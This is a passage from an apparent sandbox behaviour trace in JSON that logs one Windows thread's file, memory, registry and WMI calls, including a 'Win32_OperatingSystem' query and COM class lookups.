\\x00\\x00\\x00\\xe6\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00@" }, { "name": "Length", "value": "40" } ], "repeated": 0, "id": 774 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 775 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 776 }, { "timestamp": "2025-11-20 10:58:29,750", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00" }, { "name": "Length", "value": "24" } ], "repeated": 0, "id": 777 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 778 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xa0\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 779 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "\\x07\\x00" }, { "name": "Length", "value": "16" } ], "repeated": 0, "id": 780 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 781 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 2, "id": 782 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": " \\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 783 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00" }, { "name": "Length", "value": "16" } ], "repeated": 0, "id": 784 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "0\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 785 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "\\x01\\x00\\x00\\x00P\\x00\\x00\\x80" }, { "name": "Length", "value": "8" } ], "repeated": 0, "id": 786 }, { "timestamp": "2025-11-20 10:58:29,766", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 2, "id": 787 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "P\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 788 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00" }, { "name": "Length", "value": "24" } ], "repeated": 0, "id": 789 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 790 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x80\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 791 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "Buffer", "value": "h$\\x00\\x00\\x98\\xe0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "Length", "value": "16" } ], "repeated": 0, "id": 792 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000360" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00p\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xea\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 793 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000368" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000360" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } ], "repeated": 0, "id": 794 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "misc", "api": "GetSystemInfo", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 795 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000368" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02d90000" }, { "name": "SectionOffset", "value": "0x007f9670" }, { "name": "ViewSize", "value": "0x0000f000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 796 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0094e000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 797 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0094f000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 798 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00951000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 799 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00953000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 800 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00954000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 801 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00955000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 802 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00957000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 803 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00958000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 804 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00959000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 805 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "ValueName", "value": "en-US" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US" } ], "repeated": 0, "id": 806 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "ValueName", "value": "en" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en" } ], "repeated": 0, "id": 807 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "WMI_ExecQuery", "status": true, "return": "0x00000000", "arguments": [ { "name": "Query", "value": "Select * from Win32_OperatingSystem" } ], "repeated": 0, "id": 808 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed40c8000" }, { "name": "ModuleName", "value": "fastprox.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 809 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed40c8000" }, { "name": "ModuleName", "value": "fastprox.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 810 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed9501000" }, { "name": "ModuleName", "value": "wbemsvc.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 811 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed9501000" }, { "name": "ModuleName", "value": "wbemsvc.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 812 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 813 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000033c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 814 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c2" }, { "name": "SubKey", "value": "Interface\\{027947E1-D731-11CE-A357-000000000001}" }, { "name": "Handle", "value": "0x00000376" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}" } ], "repeated": 0, "id": 815 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000376" }, { "name": "SubKey", "value": "ProxyStubClsid32" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32" } ], "repeated": 0, "id": 816 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)" } ], "repeated": 0, "id": 817 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 818 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" } ], "repeated": 0, "id": 819 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c6" }, { "name": "SubKey", "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "Handle", "value": "0x00000376" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" } ], "repeated": 0, "id": 820 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 821 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 822 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x90o\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90p\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 823 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" } ], "repeated": 0, "id": 824 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 825 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000376" }, { "name": "ObjectAttributesName", "value": "TreatAs" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs" } ], "repeated": 0, "id": 826 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000376" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 827 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "ActivateOnHostFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags" } ], "repeated": 0, "id": 828 }, { "timestamp": "2025-11-20 10:58:29,781", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" }, { "name": "ValueName", "value": "" }, { "name": "FullName", "value": 